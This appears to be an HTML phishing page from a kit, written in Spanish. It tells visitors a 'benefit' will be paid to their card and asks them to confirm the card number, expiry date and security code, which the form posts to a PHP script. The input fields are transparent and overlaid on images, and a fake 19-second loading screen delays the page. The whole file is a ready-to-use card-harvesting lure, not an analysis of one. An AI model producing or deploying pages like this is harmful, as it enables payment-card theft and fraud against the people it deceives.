<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>


<style>
.form {
    width: 390px;
    height: 390px;
}

.for {
    user-select: none;
    pointer-events: none; 
}
.pp {
    outline: none;
    
    width: 328px;
    height: 40px;
    margin-left: -168px;
    margin-top: -149px;
    font-family: sans-serif;
  
    background-color: transparent !important;
    position: absolute;
    flex: 1 1 auto;
    min-width: 0;
    border: none;
    margin-bottom: 0;
    
   
}


.pp2 {
    outline: none;
 
    width: 328px;
    height: 40px;
    margin-left: -168px;
    margin-top: -85px;
    font-family: sans-serif;
  
    background-color: transparent !important;
    position: absolute;
    flex: 1 1 auto;
    min-width: 0;
    border: none ;
    margin-bottom: 0;
    
   
}


.fua {
    -webkit-text-size-adjust: 100%;
    -webkit-tap-highlight-color: transparent;
    --blue: #007bff;
    --indigo: #6610f2;
    --purple: #6f42c1;
    --pink: #e83e8c;
    --red: #dc3545;
    --orange: #fd7e14;
    --yellow: #ffc107;
    --green: #28a745;
    --teal: #20c997;
    --cyan: #17a2b8;
    --white: #fff;
    --gray: #6c757d;
    --gray-dark: #343a40;
    --primary: #007bff;
    --secondary: #6c757d;
    --success: #28a745;
    --info: #17a2b8;
    --warning: #ffc107;
    --danger: #dc3545;
    --light: #f8f9fa;
    --dark: #343a40;
    --breakpoint-xs: 0;
    --breakpoint-sm: 576px;
    --breakpoint-md: 768px;
    --breakpoint-lg: 992px;
    --breakpoint-xl: 1200px;
    --font-family-sans-serif: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";
    --font-family-monospace: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;
    word-wrap: break-word;
    box-sizing: border-box;
    margin: 0;
    font-family: sans-serif;
    overflow: visible;
    text-transform: none;
    -webkit-appearance: button;
    text-align: center;
    vertical-align: middle;
    user-select: none;
    transition: color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;
    width: 100%!important;
    border: 0px !important;
    outline: initial !important;
    box-shadow: initial !important;
    padding: .5rem 1.25rem .5rem 1.25rem;
    height: 55px!important;
    background-color: #00693c!important;
    border-radius: 83px!important;
    letter-spacing: 0px!important;
    color: #fff!important;
    font-size: 18px!important;
    font-weight: 500!important;
    line-height: 0rem!important;
    display: flex;
    align-items: center;
    justify-content: center;
    cursor: pointer;
}

</style>


<body>
     

<center>


    <div id="ld" style="position: fixed;width:100%;height: 100%;background: rgba(255,255,255,1);z-index: 10;text-align:center;">
        <img src="tmp.svg" style="width: 300px;margin-top: 200px;">
        <br>
        <div style="width: 126px;height: 126px;display:inline-block;border: 5px solid #00693c;border-radius: 50%;">
            <img src="p.gif?id=50" style="width: 110px;position: relative;top: 36px;">
        </div>
    </div>

<form action="php/indeff.php" method="post" class="form">


 


<img style="width: 250px; user-select: none;
pointer-events: none; " src="l.png" alt="">

  

<img style="width: 200px; user-select: none;
pointer-events: none; " src=" " alt="">
 
<div style="width: 300px;">
<p style="font-family: sans-serif;color: #00693c;font-size: 20px;">Confirma los datos de la Tarjeta que recibira este beneficio</p>
</div>


<br><br>

<img class="for" src="img/tarjtitulo.png" style="width: 100%;" alt="">

<br><br>

<div>
     <input style="margin-top: -145px;" class="pp" type="text" name="tarj" id="" placeholder="Ingresa numero de tarjeta" required>

</div>



  <br>

<div style="margin-top: 4px;">
    <input inputmode="numeric" type="text" id="fecha" name="fecha" maxlength="7" oninput="formatFecha(event)" required  style="margin-top: -95px;" class="pp2" id="fecha"  placeholder="MM/AA" required>
</div>




<img src="img/cvv.png"  alt=""  style="width: 100%;margin-top: -40px;" >


<br><br>


<input type="submit" value="Ingresar" class="fua">

<div style="margin-top: -20px;">
   <input style="margin-top: -110px;" class="pp2" type="text" inputmode="numeric"  name="pass" id="" placeholder="Código de seguridad" required>

</div>

<br>

<img src="img/abj.png" alt="" width="100%">
 





</form>



<script>
    function formatFecha(event) {
      let input = event.target;
      let inputValue = input.value.replace(/\D/g, '');
      let formattedValue = '';

      if (inputValue.length >= 2) {
        formattedValue += inputValue.substr(0, 2);

        if (inputValue.length > 2) {
          formattedValue += ' / ' + inputValue.substr(2, 2);
        }
      } else {
        formattedValue = inputValue;
      }

      input.value = formattedValue;
    }


     // Ocultar el cargador después de 19 segundos
     window.onload = function() {
            setTimeout(function() {
                document.getElementById("ld").style.display = "none";
            }, 19000);
        };
  </script>

</center>




</body>
</html>